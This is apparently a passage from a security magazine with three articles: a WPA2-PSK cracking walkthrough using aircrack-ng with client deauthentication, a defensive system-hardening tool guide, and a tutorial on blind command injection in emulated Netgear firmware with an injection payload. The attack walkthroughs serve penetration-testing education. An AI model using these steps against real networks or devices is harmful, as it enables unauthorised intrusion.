Wireless Hacking With Aircrack-ng
References
• Aircrack-ng (2010). Available at
https://www.aircrack-ng.org
retrieved 07/03/2017
• Fluhrer, S., Mantin, I., Shamir, A.,
(2001). Weaknesses in the key
scheduling algorithm of RC4. In
Eighth Annual Workshop on Selected
Areas in Cryptography, Toronto,
Canada, Aug. 2001.
• IEEE (2012). IEEE 802.11 Wireless
LANs. Available at,
http://standards.ieee.org/getieee802
/download/802.11-2012.pdf,
retrieved 16/03/2017
• Kali (2016). Available at,
https://www.kali.org/downloads ,
retrieved 07/03/2017
105
HACKING WPA2-PSK
WITH KALI LINUX

by Uche Akajiuba
 Hacking WPA2-PSK With Kali Linux

A wireless network is a network that uses radio waves to connect computers and other like devices together. The
implementation is done at the physical layer (Layer1) of the OSI model.

WPA2 (Wi-Fi Protected Access) is a wireless security protocol that makes use of AES encryption and CCMP, a
TKIP replacement. It is stronger than the other wireless security protocols (WEP, WPA).

WPA2 pre-shared keys use passphrases. This is the weakness I will exploit to crack a WPA2 protected network and
gain access to it. Doing so requires software and hardware resources, and patience. The success of such attacks can
also depend on how active and inactive the users of the target network are. We are going to take a step-by-step look at
how you can break WPA2 using Kali Linux.

Our attack tool is the aircrack suite of tools in Kali Linux and we will employ the sniffing method; this involves
intercepting packets as they are transmitted over a network. If you feel you have the necessary skills, let’s begin:

These are things that you’ll need:

● A successful install of Kali Linux (which you can easily obtain).

● A wireless adapter capable of injection/monitor mode. Some computers have network cards capable of this from
the factory.

● Be within the target network’s radius.

● A wordlist to attempt to “crack” the password once it has been captured.

● Time and patience.

If you have these, then roll up your sleeves and let’s see how secure your network is!

Important notice: Hacking into anyone’s Wi-Fi without permission is considered an illegal act or crime in most
countries. We are performing this tutorial for the sake of penetration testing, hacking to become more secure, and I’m
using my own test network and router.

Step 1:

Open a terminal and find the name of your wireless adapter, type iwconfig on a terminal. See the result. (here my
wireless adapter is ‘wlan0’).

107
 Hacking WPA2-PSK With Kali Linux

Your computer has a number of network adapters, so to scan one, you need to know its name. So there are basically
the following things that you need to know:

●lo - loopback. Not important currently.

●eth - ethernet.
●wlan - This is what we want. Note the suffix associated.

Step 2:

Enable Monitor Mode

We use a tool called airmon-ng to create a virtual interface.

Type airmon-ng start followed by the interface name of your wireless card. Mine is wlan0, so my command would
be: airmon-ng start wlan0.

Here our newly created virtual interface is called wlan0mon.

Step 3:

Capturing Packets.

108
 Hacking WPA2-PSK With Kali Linux

We’ll use airodump-ng to capture packets in the air; this tool gathers data from all wireless packets within our reach.
Airodump will now list all of the wireless networks, and a lot of useful information about them.

We will locate a network to hack (ensure that you hack only your network or the network you have permission to
hack). Once you’ve spotted your network on the ever-populating list, hit Ctrl + C on your keyboard to stop the
process. Note the channel of your target network.

To do this, type airodump-ng followed by the name of the new monitor interface (wlan0mon).

Our test network is “mask”.

You can also force the wireless card to scan and report all wireless networks in the vicinity using this command:

109
 Hacking WPA2-PSK With Kali Linux

As you can see from the figure above, our target network (MASK) is also displayed.

Focus on the target network

Our next step is to focus our efforts on “mask”, and capture critical data from it. We need the BSSID and channel to do
this. Let's open another terminal and type:

airodump-ng --bssid (BSSID of mask) -c [channel] --write [file you want to write to]
[interface]

110
 Hacking WPA2-PSK With Kali Linux

As you can see in the screenshot above, we're now focusing on capturing data from one AP/router with an ESSID of
Mask on channel 11.

Capture the handshake

We will leave the open airodump-ng screen to tell when we have a WPA2 handshake. In order to capture the encrypted
password, we need to have the client authenticate against the AP/router. We need to catch a user in the act of
authenticating to get a valid capture. Airodump-ng will display a valid handshake when it captures it. It will display the
handshake confirmation in the upper right hand corner of the screen.

We also can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can
grab their encrypted password in the 4- way handshake process.

I will show you the two scenarios:

1. waiting

What we’re really doing now is waiting for a device to connect. Once this happens, we get a handshake as shown
below:

111
 Hacking WPA2-PSK With Kali Linux

2. force re-authentication
I really don’t like waiting for a new device to connect, no, that’s not what impatient hackers do. We’re
actually going to use another tool that belongs to the aircrack suite, called aireplay-ng, to achieve this.
Instead of waiting for a device to connect, we will use this tool to force an already connected device to
reconnect by sending deauthentication (deauth) packets to the client, thereby making it reconnect with the
network.

Here we have a client already connected. Let's open another terminal and type:

● aireplay-ng --deauth [no. of deauth packets] -a [BSSID] [interface]

I had to send 50 deauth packets. You can try less.

112
 Hacking WPA2-PSK With Kali Linux

…and we have our handshake!

Also, four files should show up in your chosen airodump directory, this is where the handshake will be saved
when captured, so don’t delete them!

Crack the Password

Here is the fun part! Now that we have the encrypted password in our file WPAPSKCRACK-01.cap, we can run that file
against aircrack-ng using a password file of our choice. I created a customized wordlist called wordlist.txt with crunch,
and will be using this to crack the encrypted password for mask. This wordlist is located on my desktop.

We'll now attempt to crack the password by opening another terminal and typing:

● aircrack-ng [captured packet file] –w [Absolute path to our wordlist)

Cracking the password might take a long time depending on the size of the wordlist. Mine went very quickly.
Remember that this type of attack is only as good as your wordlist.

Here we are:

113
 Hacking WPA2-PSK With Kali Linux

Proof Of Concept

Let’s try to login with the password we found:

114
 Hacking WPA2-PSK With Kali Linux

As you can see, we are connected.

Note the channel (11).

Now that we are in the network, we can take the exploit further, as far as attacking the connected systems.

Enjoy!!

115
 Hacking WPA2-PSK With Kali Linux

ABOUT THE AUTHOR

Uche Akajiuba

Uche is an award winning Penetration Tester and Ethical Hacker with

widespread experience in Computer Forensics, Scripting, Reverse

Engineering and Information Security Management. He has a wealth of

experience in several professional roles such as Security Governance, IT

Risk, vulnerability management, cyber security, etc. A security researcher

and strategist, Uche is currently an IT security Engineer at Standard Bank

Group Nigeria.

116
SYSTEM
HARDENING TOOLS
AND TIPS
by Sumit Kumar Soni
 System Hardening Tools And Tips

Improve system security using simple hardening principles and

measures

In the tug of war between attacker and defenders, defenders need to secure the complete attack surface. In general, the
attack surface is comprised of all possible entry points for an attacker. While the defenders or your system
administrators need to mitigate every single existing attack vector, the attackers need to find just one single
unprotected vector.

Applications usually come with their default settings and these settings include things like default username
/password, making for a default unsecure configuration. If an administrator does not change these configurations,
criminals would be able to easily compromise the application. By implementing system hardening, one can improve
the effectiveness of protection & detection mechanism in multifold. The old saying, prevention is better than cure is
not only applicable to humans but also on the systems.

What you will learn:

What is System hardening
Hardening Process
Resources available for hardening
Windows tools to implement the hardening
Linux tools to implement the hardening

What you should know:

Basic knowledge of Linux & Windows
Knowledge about systems administration

SYSTEM HARDENING DEFINITION

Hardening: As per NIST 800-53, hardening is configuring a host operating system and application to reduce the
host security weaknesses.
Hardened operating system is an operating system which has been configured or designed specifically to
minimize the potential for compromise or attack.

GOALS OF HARDENING
FOR PREVENTION
1. Decrease attack surface: This will make it difficult for an attacker to attack the system

2. Decrease available privileges: This will contain the attacker’s ability to compromise the high privileged
data
3. Decrease available components and information: This will decrease the available software functions for

an attacker, as well as making it more cumbersome for an attacker to traverse further into the system. Ideally,
attackers are completely put on hold.
For example, if a system is supposed to host only a web server, by hardening, you will close all the other services that

118
 System Hardening Tools And Tips

would be running by default on your OS, like Network sharing, FTP, etc., and it will reduce the risk of attacks related
to these service. Similarly, making sure that the web server does not run with administrative/root privilege, we can
further eliminate the risk of complete system compromise in case of a successful attack on the web server.

FOR DETECTION
1. Increase the likelihood of detecting an attack on the system: If you know your system well enough in

terms of required components, implementing the hardening which you will get by product. Knowledge about
your system’s normal behavior helps you to detect any anomaly.
For example, this will include knowledge about the web server configuration file which does not change or
which network service is commonly used on a host. This knowledge is a perfect baseline and will help in
detecting attacks in the sense of security monitoring. On a hardened system, you increase the likelihood of
successful detection of the attack significantly in comparison to an unhardened system. As you analyze the
system & its attack surface well enough through your hardening process, you can spot and understand any
anomaly much better.
2. Improve future security posture: By providing a baseline of a machine that is considered hardened, for

example, disabling the unneeded port by default or having only required services run on an as needed basis, this
require to avoid the repeat on each system what process to set it on . On a hardened system, it is possible to
identify the last weak spot which is currently abused by the attacker and to improve the future security posture.

If we know which configuration files of the web server should not change and only services like HTTP, DNS and
DHCP are supposed to run on a system, we can easily identify any new service that has been installed or run by the
malicious programs, which will lead to early detection of the compromise.

GUIDANCE FOR IMPLEMENTING HARDENING

HARDENING COMPONENTS
Every attacker is hoping for a badly configured component or a component with the default configuration, so instead
of just sticking to the default configuration, you should consider what configuration may be the best fit for your
environment and security needs and act accordingly. Depending on the actual components, such as a web server,
recommendations for a secure configuration may exist. Ideally the vendor of that component has put out some
security configuration information or even a template already. You can find a lot of different sources on hardening for
most of the well-known and widely used software components. A very good starting point maybe the best practice
guide and benchmark from the Center of Internet Security (CIS).

CIS not only publishes a hardening guide but also predefined configurations that you can use with certain tools, other
sources may be sector specific such as PCI-DSS, federal information security management act, FISMA and NIST 800 -
53 and others depending on the industry or sector in which you are operating. The key take away is to apply hardening
not only onto a whole system but to consider hardening of the individual components as well.

119
 System Hardening Tools And Tips

HARDENING CONSIDERATION BEFORE IMPLEMENTING

Before starting with the hardening process itself, first of all you should think about the security goal that you want to
reach with your hardening measures. Next you need to understand the functionality of your system, the state the
system is in and the existing components, as well as the relations and dependencies between those components. After
that, you will need to identify what exactly needs hardening and which measures to apply. Again, a well defined
baseline can be your greatest ally to complete this task. The last step is to estimate the cost of certain measures and
define consequences to implementing and not implementing those measures. If a defined measure is not suitable, you
may need to rethink your security level and reiterate the previous level.

HARDENING PROCESS
While undergoing hardening, a system may be required to be isolated from its current environment in order to
implement a measure. This may lower the security of the system temporarily. This could happen if, for example, the
firewall has to be turned off to install a new service on system. In the next step, you need to verify that the system is in
a secure state, for example, free from malware. After the system is determined to be clean, it is advisable to create an
inventory of all components. The next step will be the most crucial within the process, the actual deployment naming
the application of hardening measures onto your system. Most of these measures include reconfiguration of a
component. It is highly advisable to check if your measures are affected and how the attack surface changed.

In the next step, we recommend generating a snapshot from the current hardening baseline and use it as a template
for comparison and monitoring. If the system was isolated for hardening it is now time to return the system back to its
intended environment and reuse the baseline as a template for hardening for other similar systems. Note that this
process is meant as a rough guide and taking into account the most critical steps you may need to adapt it to your own
needs.

DEFENCE IN DEPTH WITH HARDENING PROCESS

Figure 1: Correlation between layers in defense in depth & hardening impact

120
 System Hardening Tools And Tips

Defense in depth is an approach to increase security by not relying on a single protective mechanism by applying
multiple layers of defense. There is a correlation between the layers within the defense-in-depth principle and impact
of the hardening process on different layers.
Data: At the innermost (data) layer, many steps of the process apply. First we have to take a valid state of the data or
we can assure that the data is not corrupted. Next we create an inventory of our data to know where which data is
stored and which permissions apply to it. Then we need to check the attack surface, for example, by reviewing the
access permissions.
Application: Moving up towards the next layer is the application layer which includes nearly the same steps as the
data layer except for the last step. We create a baseline and a template based on the installed and now securely
configured applications. This can be done, for example, by exporting the application configuration. On this layer,
creating an inventory includes information about the software, like version and vendor and other characteristics, and
examples of software that updates automatically.
Host: Next layer is the Host layer which includes similar steps but again different measures in comparison to the
lower layers. Creating an inventory for the host includes information about the install operating system, which
hardware is in place and what the current state of system configuration is. Mechanisms for creating a template for host
can range from creating a copy of the host by creating a virtual machine based on the host to using specialized tools
for the template task.
Network and Perimeter: In the two uppermost layers of the network layer are measures like isolating the system
from the network with a firewall. The perimeter layer even goes a step further with measures such as being physically
isolated from other systems; again, different types of network access control.

HARDENING GUIDES AND TOOLS

In this section, we will discuss some of the tools and guide you with ways you can use to harden your system. In order
to give you some practical takeaways, we will take a closer look at resources and generic tools not tied to a specific
platform but also tools specifically available for Windows and Linux. Let's start off with an overview map of the
hardening guidelines out there or you can get additional specific guidance for different platform.

General Sector: It includes generic guidance that is not specific for a platform and thereby contains abstract
measures as well as very sector-specific guidance. E.g. NIST 800-123 or NIST 800-53 and sector specific compliance
guideline e.g. PCI-DSS, FISMA. This is great as a starting point to get a feeling for what type of measurements should
be in place.
Cloud: Here you would be well advised to look for vendor-specific hardening guidelines tied to the cloud platform.
Operating Systems: At this point, we would like to introduce some well-known security configuration guidelines.
The most significant and up-to-date guide for the operating systems is from the Center of Internet Security. Other
vendor independent sources are, for example, those coming from governments like the Defense Information Systems
Agency with their Security Technical Implementation Guide, also known as STIGS. If you are using Windows, the
system configuration guides, as well as the official Microsoft Windows system guide will help you to harden a
Windows system. Linux specific hardening guides for major distributions and some secure configuration guidelines

121
 System Hardening Tools And Tips

are available as well.

Applications: As we move to the application, we can refer to the CIS guide & vendor’s specific hardening guides, for
example, web server, databases or other applications.
Besides CIS & the vendor, it is advisable to take a look at the availability of the best practices from third parties.

GENERAL TOOL
CIS-CAT
CIS configuration tool (CIS-CAT) is a generic and mostly platform-independent tool for configuration assessment. It
can verify the system configuration against the newest benchmark available for your platform. The application is
written in Java. It is being fed with a template file and can therefore also be used for hardening check on a large scale.
You can download it from https://learn.cisecurity.org/cis-cat-landing-page

Figure 2: CIS-CAT output

In addition to CIS-CAT, there is also a huge variety of commercial security auditing tools available which include
checks of hardening measures and do vulnerability scanning. These kinds of tools are used to assess the state of a
system from the network according to certain standards for configuration, such as the ones from CIS, and can also
check against user defined templates. However, only a small part of these security audit tools are available for free.

TOOLS FOR WINDOWS

MICROSOFT BASELINE SECURITY ANALYZER (MBSA)
MBSA can be used with a Windows operating system family. It comes with the ability to check that all available
updates are installed and can also detect the most common Windows misconfigurations, such as guest accounts to
Microsoft Baseline security analyzer. It also include checks for a lot of Microsoft applications. It can be run remotely to
analyze multiple systems and also has a command line interface. Generated HTML reports can't help you with
automating your monitoring.

122
 System Hardening Tools And Tips

You need to download it from the Microsoft homepage

(https://www.microsoft.com/en-ca/download/details.aspx?id=7558). When you open it, the first screen will give you
the choice between scanning a single machine, scanning multiple machines or reviewing an already existing report
which shows the first option and will scan the local system.

Figure 3: MBSA system scan options

On the next screen, you can set the parameters of the report by specifying the system name or IP address, the report
name and what should be scanned.

Figure 4: MBSA system selection option

After selecting what should be scanned, we start the scan process. It may take a while to conclude but after the scan
finishes you can see a report with all the details. The header consists of the parameters of the scan followed by the
results which show information about the test. You can view more detailed information for every result in the report.

123
 System Hardening Tools And Tips

Figure 5: MBSA report

WINDOWS APPLOCKER
Applocker is an application control solution for Microsoft Windows available in several Windows versions. It is turned
off by default. The configuration of Windows Applocker can be done either through snap-in on the Microsoft
Management console, through module in PowerShell or Windows Group Policy. The second method allows
management of Applocker policies on a large range of clients within a Windows domain. The rule sets for Windows
Applocker can be separated in five different default categories and each applies to a certain type of application. For
example, dll rules handles files with .dll extension or .ocx file type and script rules manage certain scripting files.
Asides from the general rules, it can generate rules for applications automatically. These rules should be reviewed and
tested before being deployed in the production system. We can define two different behaviors for the rules; either you
can enforce a lockdown or you can just log the violation and use the information for monitoring. Here is the example
on how to block a script executing in your home directory. This is a common behavior exhibited by some malware.

To configure it by using the local security policy snap-in under application control policies, we find the Applocker
entry and in the first section, we see a description of the service and some helpful information. If we scroll down, we
find the settings to configure the enforcement of rules to block the bat file from running.

Figure 6: Applocker from local security policy

124
 System Hardening Tools And Tips

We can create a new script with a right click.

Figure 7: Applocker create rule

Then we can set the action to deny and select a user to whom we want to apply the rule.

Figure 8: Applocker rule action and user selection

Now we need to select how to block a file; we choose path. You have the option to add exceptions to your rule. Here we
can see that a new rule was added to configure the rule enforcement tree.

Figure 9: Applocker rule enforcement

We can test the rule by clicking on the script. No command window or error message should be open. If we try to
execute the script for command line, we can see that it is blocked by group policy.

125
 System Hardening Tools And Tips

Figure 10: Applocker rule blocks script execution

For more detailed information about what was blocked, we need to take a look into the system event. By using the
event viewer, you will navigate to the Applocker entry and click on script where you can see the monitored event about
the script execution.

Figure 11: Applocker results in event viewer

ENHANCED MITIGATION EXPERIENCE TOOLKIT (EMET)

To be able to harden third-party applications running on Windows, even when no source code is available, Microsoft
developed the enhanced mitigation experience toolkit (EMET). This actively applies countermeasures for common
exploitation against application binaries during runtime. Imagine having an older version of a web server binary that
needs to be in place for compatibility reasons. You would be able to harden such a dangerous element. You can use
EMET to harden nearly every Windows application during runtime. However, it cannot only block the exploitation
attempt but also limit the actual impact they can have. There are many mitigations built into EMET which can be
activated on a per application basis. To run EMET, you only need a Windows installation and the dot Net Framework
4.0. This could be integrated into domain GPO to also make a large deployment feasible. Initial compatibility testing is
required, as some legacy applications may not run with some mitigations.

It is completely free. There are more free tools from Microsoft to improve system hardening, for example, Bitlocker
which encrypts hard drives and increases the physical security systems. Finally, Device guard has been introduced
with Windows 10 and hardens the integrity of the system by using a combination of hardware features, such as trusted
126
 System Hardening Tools And Tips

platform module, and software features, like code signing. Incorporating some OS tools can increase the protection of
Windows platforms against different types of attackers.

TOOLS FOR LINUX

OPENSCAP
It is an implementation of the NIST SCAP Standard, which means Security Content Automation Protocol. This is a
standardized way to define system audit policies, among other things. The policies created for the tool can be used for
a whole platform or for single application. With this, along with auditing your platforms, you can also apply measures
automatically. You can find the good SCAP files or secure configuration guide from the National Check List Program
Repository. This is the U.S. Government repository of publicly available security checks and provides for the
configuration of operating systems and applications.

It can be downloaded from https://www.open-scap.org/tools/openscap-base/

$ oscap xccdf eval --report report.html --profile

xccdf_org.ssgproject.content_profile_pci-dss
/usr/share/xml/scap/ssg/content/ssg-rhel7-ds.xml

We can run a PCI-DSS compliance test with OPENSCAP for RHEL7 system with a number of parameters. The first
option specifies the xccdf format as source format. With the next parameter, we said we want to do an evaluation, by
the next we give an output file for the report and the second to last option selects the profile from the xccdf document.
The last option is the xccdf file itself where all policies and profiles for checking are defined. You can get to know more
about other available parameters for running a scan by referring to the corresponding manual.

With the above command, you can generate an HTML report. The header includes the text about the scan policy,
parameters and other interesting information.

Figure 12: OPENSCAP Report header

127
 System Hardening Tools And Tips

The report contains information about compliance to SCAP security benchmark and achieved score in the test results
and the results of every test. The results show how many rules were successful, how many failed and how many didn't
execute as expected.

Figure 13: OPENSCAP Report Compliance and scoring

The report additionally shows the impact of the failed rules, categorized with low, medium and high severity, and the
score at the end of this section in the report indicates the compliance state of the system against the policy.

Figure 14: OPENSCAP Report severity

The main part of the results includes the detailed results of every test, test description and information about how the
test was done and how to mitigate your configuration if the test failed.

Figure 15: OPENSCAP Report test details

LYNIS
128
 System Hardening Tools And Tips

It is a tool for Linux and other Unix-like systems that checks a host for common hardening measures and gives
feedback about their status. A hardening index will be created which sums up the hardening state in a single score. The
test and policies are written by CISOFY and are updated regularly. These tests can be run by a command line interface
and SISOFY offers a commercial pass version. It also can be extended with plugins.
To download go to https://cisofy.com/download/lynis/
The following command will run all tests against our system and doesn't stop asking questions.

$ lynis audit system –Q

Now the tool conducts the system checks. You can see the tests that are being run and the status of the tests. It also
writes to the log file for further usage.

Figure 16: Lynis output

After Lynis has collected all results, you can see a short summary of this, which consists of the hardening index score,
the location of log files and some general info. Now it's up to you to decide whether you are satisfied with that
benchmark or want to improve the hardening posture.

Figure 17: Lynis summary

SUMMARY
The main goal of hardening is to reduce the attack surface & privileges in case of a successful attack. It can help the
early detection of attacks. Hence hardening has to be the core of your security strategy. While implementing
hardening, keep in mind the end user requirement as it may impact the user’s work ability. Hardening has an impact
in defense in depth layers as each layer will require similar steps but different measures. There are many tools and
guidance available to implement hardening for your specific environment and sector. These tools provide the ability to
create the baseline and automate the hardening process. Most of the tools are free and can easily be incorporated in
your SDLC.

129
 System Hardening Tools And Tips

ABOUT THE AUTHOR

sumit kumar soni
I have more than 10 years of experience of working in the Application and system

security field. I specialized in the field of Deep Inspection and IDS/IPS testing and

evasions. I have exposure to all areas of the security including reverse engineering,

Vulnerability Research, Exploit Development, Malware Analysis, Pen testing. I am

CISSP and responsibly reported security vulnerabilities in various products.

Currently I am working as QA Architect – Vulnerability Research with TrendMicro Canada.

You can reach me on

Twitter: @sumit_uit

https://www.linkedin.com/in/sumitksoni

REFERENCE

• CIS BENCHMARKS https://benchmarks.cisecurity.org/

• NIST SP 800-53, Guide to General Server Security

http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf

• NIST SP 800-123, Guide to General Server Security

http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-123.pdf

• Microsoft – Baseline Server Hardening

https://technet.microsoft.com/en-us/library/cc526440.aspx

• AppLocker Overview

https://technet.microsoft.com/en-us/library/hh831409(v=ws.11).aspx

• OpenScap https://www.open-scap.org/

• Lynis https://cisofy.com/lynis/

130
EMULATING
FIRMWARE FOR BLIND
COMMAND INJECTION

by Nitesh Malviya
 Emulating Firmware For Blind Command Injection

Hello, everyone. Welcome

In this article, we will be learning how to emulate a firmware for exploiting Blind Command Injection vulnerability in
the Netgear firmware. Let’s start.

The article has been divided in two parts:

First Part – Firmware emulation

Second Part – Exploiting command Injection

First Part

Firmware emulation

What is emulation?

Let’s understand the meaning of emulation in simple words. Suppose you get a firmware file (bin/img) from any
source, like their official website, and you want to run the firmware file, i.e. img/bin file. How can you run it? There
are two ways:

1. Hardware Emulation – In this, you get a hardware device, like a router, and you upload the firmware file
onto the router and interact with the firmware via an interface. The issue with this method is you always need
a hardware device to run the firmware.
2. Software Emulation – In this, we use software instead of hardware. The software mounts the firmware
and you interact with the firmware. The biggest advantage using this method is you don’t need any hardware
and you can run as much as firmware you wish to.
Let’s start Firmware Emulation using the software emulation method.

Tools

We can make use of the following tools for Software Emulation

1. QEMU– QEMU is the emulator used for emulating firmware. More info on QEMU can be obtained here –
QEMU-INFO. For setting up QEMU please refer to – QEMU-SETUP and for firmware emulation demo –
QEMU-DEMO
2. Firmware Analysis Toolkit (FAT) – FAT is the toolkit used for firmware emulation. It uses tools such
as Firmadyne, Binwalk, Firmware Mod Kit, MITM Proxy and Firmwalker for emulation. Please refer to FAT
for setting up FAT on your system. We will use this tool for exploiting blind command injection.

132
 Emulating Firmware For Blind Command Injection

I hope you have setup FAT for Firmware emulation. Please download Netgear Firmware for the demo.

Step by step procedure for firmware Emulation along with the screenshots:

Step 1 – Copy Netgear Firmware in Firmadyne folder as shown:

Now you should have firmware file WNAP 320.zip and fat.py in the same folder. fat.py is the Python script which will
help us in emulating the firmware.

Step 2 – Run fat.py script and enter following information as highlighted:

After pressing enter, it will ask you for your password two or three times. Enter the same password you have used for
setting up firmadyne. In my case, the password is firmadyne, and after entering the password, wait for two minutes
and it will give you the IP address of the firmware as shown below:
133
 Emulating Firmware For Blind Command Injection

Step 3 Accessing via Browser – Enter the IP address obtained in step 2. It may happen that you may not be able
to access the firmware in your 1st attempt. Try it four or five times and you will surely get access to the firmware login
page.

Step 4 Login with username/password – admin/password and you should be logged in as shown:

134
 Emulating Firmware For Blind Command Injection

So this is how we emulate firmware using firmadyne and I hope you have also emulated the firmware by following the
above steps.

Second Part

Exploiting command Injection

We have emulated the firmware and now we will exploit Blind Command Injection vulnerability present in the
firmware.

Here are the steps we will follow:

1. Extract the firmware for viewing the source code of the file present in the firmware.
2. Inspect source code for Blind Command Injection exploitation.
3. Request the file via Browser.
4. Intercept the HTTP request of the file via Proxy Tool (Burp Suite, Paros, etc.) and change the parameters.
5. Exploit Blind Command Injection.
Let’s start.

Extract the firmware using binwalk -e option (I have presented the whole process on my blog post called Reversing
Firmware for Extracting Hard-Coded Telnet Credentials) and follow the steps as highlighted in the screenshot:

135
 Emulating Firmware For Blind Command Injection

We are in the _rootfs.squashfs.extracted folder which contains all the files present in the firmware. Now we need to
find php files present in the firmware and it can be done using the command find . -name “*.php”

Command Explanation

find – name of the command

. – starting from current directory

*.php – any file ending with .php extension

This command will list all the php files present in the firmware as shown:

136
 Emulating Firmware For Blind Command Injection

A file exists called boardDataWW.php that asks for MAC Address as shown below. File boardDataWW.php is
present in home/www/ folder.

Let’s see the source code of the boardDataWW.php file.

As highlighted, parameter macAddress is passed to exec command (2nd highlighted part) and the input is not filtered
(1st highlighted). exec is the function in php used for executing OS commands. The input is taken as is, thus we can
pass OS commands as well with the macAddress parameter.

137
 Emulating Firmware For Blind Command Injection

Intercept all the request responses in the Firefox browser. You can use Burp Suite, Paros, OWASP ZAP, etc. I am using
Burp Suite and the process for intercepting in Firefox can be found here – Burp-For-Firefox.

Intercept the Firefox request as shown:

Send this request to repeater tab by right clicking on it and selecting repeater option. Now we can enter any command
in the macAddress field and check the response. Let’s enter 001122334455 -c ; ls # in the macAddress field.

Command Explanation:

; – Terminate the first input.

# – Whatever comes after # will be treated as comment.

So we are asking exec function to execute mac_address_value -c ; our_command.

138
 Emulating Firmware For Blind Command Injection

As seen, the response is Update Success! We were expecting a list of directories in the response since we have passed
ls command but we received Update Success in response. What does it mean? It means our command was executed
successfully but it did not return the result of our command, i.e list of directories on browser. This is a typical example
of Blind Command Injection.

Let’s exploit Blind Command Injection by outputting the result of ls command in a file as shown:

Now let’s access demo.txt from browser and see the output:

Voila! It returns a list of all the files present in the firmware. Similarly, we can execute any OS command and get the
output in demo.txt file.

That’s it. Here we end the article about Blind Command Injection. Thanks for reading.

139
 Emulating Firmware For Blind Command Injection

about the author

Nitesh Malviya

Hello, everyone. I am Nitesh Malviya, working as a Security Consultant with Payatu Technologies in

Pune. I have experience in Web Appsec, VAPT and Mobile

Appsec (only Android) and am currently working on Cloud and

IOT security. I am an active member of null Mmumbai chapter

and blog at https://nitmalviya03.wordpress.com. Last but not

least, I am open to any opportunity on IoT and Cloud Security.

140